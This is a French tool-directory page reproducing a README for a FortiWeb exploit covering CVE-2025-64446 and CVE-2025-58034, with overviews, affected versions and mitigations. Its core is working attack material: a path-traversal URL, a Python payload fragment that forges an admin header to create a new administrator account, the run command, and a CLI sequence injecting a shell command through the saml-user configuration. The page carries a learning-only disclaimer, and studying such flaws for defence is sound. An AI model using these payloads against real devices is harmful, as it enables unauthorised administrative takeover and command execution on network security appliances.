Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Vulnerability-CVE-2025-64446-CVE-2025-58034 — Vulnérabilité FORTIWEB_CVE-2025-64446 & CVE-2025-58034 | Kitploit
Outils/GitHubGitHub/litndat/vulnerability-cve-2025-64446-cve-2025-58034
Authentification et AutorisationAnalyse des VulnérabilitésExploitationExploitation d'Applications WebApprentissage et ÉducationLabs et Pratique
GitHublitndat/vulnerability-cve-2025-64446-cve-2025-58034

Vulnerability-CVE-2025-64446-CVE-2025-58034

Vulnérabilité FORTIWEB_CVE-2025-64446 & CVE-2025-58034

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
il y a 1 moisPas encore vérifié

Simulation d'exploitation FortiWeb (CVE-2025-64446 & CVE-2025-58034)

Remarque :

  • Ce document est uniquement destiné à des fins d'apprentissage et de recherche en sécurité.
  • Ne pas l'utiliser pour attaquer un système sans autorisation.

1. Vue d'ensemble

FortiWeb est un dispositif Web Application Firewall (WAF) utilisé pour protéger les applications web.

En 2025, deux vulnérabilités critiques ont été découvertes :

  • CVE-2025-64446 – Contournement de l'authentification par Path Traversal
  • CVE-2025-58034 – Injection de commandes système (OS Command Injection)

2. Vue d'ensemble de CVE-2025-64446

ChampContenu
Type de vulnérabilitéRelative Path Traversal
Authentication Bypass
CauseFortiWeb traite les chemins de manière laxiste avant l'authentification :

- Contrôle d'accès basé sur la chaîne de chemin logique
- Absence de normalisation complète du chemin
- Autorise l'utilisation de ../ pour accéder aux ressources internes
DescriptionCertains points de terminaison (endpoints) d'administration peuvent être consultés sans authentification valide
Impact- Contournement complet de l'authentification
- Accès non autorisé aux fonctions d'administration
- Rupture du modèle de gestion des privilèges
Versions affectées- 8.0.0 – 8.0.1
- 7.6.0 – 7.6.4
- 7.4.0 – 7.4.9
- 7.2.0 – 7.2.11
- 7.0.0 – 7.0.11

Exemple :

root@kitploit:~
/api/v2.0/cmdb/system/../../../../../../cgi-bin/fwbcgi

3. Vue d'ensemble de CVE-2025-58034


4. Processus d'expérimentation (POC)

4.1. Préparation de l'environnement :

root@kitploit:~
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt

Cela permet d'éviter les conflits de versions de bibliothèques, de garantir la stabilité de l'environnement de travail et de limiter l'impact sur le système.

image

4.2 Exploitation

Payload

root@kitploit:~
 cgiinfo_json = {
        "username": "admin",
        "profname": "prof_admin",
        "vdom": "root",
        "loginname": "admin"
    }
cgiinfo_b64 = base64.b64encode(json.dumps(cgiinfo_json).encode()).decode()
conn.request("POST", "/api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi", body=body_data, headers=headers)
        resp = conn.getresponse()
result = {
            'target': f"{host}:{port}",
            'status': resp.status,
            'user': username,
            'password': password,
            'success': resp.status == 200
        }

Exécutez l'outil avec Python3 :

root@kitploit:~
python3 exploit.py <IP_target>
  • <IP_target> : L'adresse IP correspond ici au nom d'hôte de l'appareil FortiWeb.
image

On obtient le nom d'utilisateur et le mot de passe -> on procède à la connexion.

image image

Exploitation réussie : un nouveau compte avec les droits d'administrateur a été créé.

4.3 Exploitation de CVE-2025-58034 après connexion au compte

Après s'être connecté avec succès à l'aide du compte administrateur nouvellement créé, l'attaquant peut exploiter la vulnérabilité d'injection de commandes authentifiée via des requêtes spécialement conçues ou directement via l'interface en ligne de commande FortiWeb CLI :

root@kitploit:~
config user saml-user

edit "`id`" ## nhập lệnh tại đây

set entityID http://foo

set service-path /foo

set enforce-signing disable

set slo-bind post

set slo-path /foo

set sso-bind post

set sso-path /foo

end

FortiWeb sort de la séquence de configuration et exécute la commande id pendant la configuration de saml-user.

5. Mesures d'atténuation des vulnérabilités

  • Mettre à jour FortiWeb vers une version corrigée.
  • Restreindre l'accès à l'interface d'administration.
  • Ne pas exposer l'interface de gestion sur Internet.
  • Vérifier les comptes administrateur inhabituels.

6. Références complémentaires

  • CVE-2025-64446 – https://nvd.nist.gov/vuln/detail/CVE-2025-64446
  • CVE-2025-58034 – https://nvd.nist.gov/vuln/detail/CVE-2025-58034
Télécharger l’outil
ChampContenu
Type de vulnérabilitéOS Command Injection (CWE-78)
CauseFortiWeb traite les entrées de manière non sécurisée lors de l'exécution de commandes système :

- Absence de validation des entrées
- Absence d'échappement des caractères spéciaux
- Transmission directe des données utilisateur dans les commandes système
DescriptionLa vulnérabilité nécessite une authentification mais permet d'injecter des commandes système
Impact- Exécution de commandes non autorisées
- Accès aux ressources système
- Atteinte à l'intégrité et à la disponibilité
Versions affectées- 8.0.0 – 8.0.1
- 7.6.0 – 7.6.5
- 7.4.0 – 7.4.10
- 7.2.0 – 7.2.11
- 7.0.0 – 7.0.11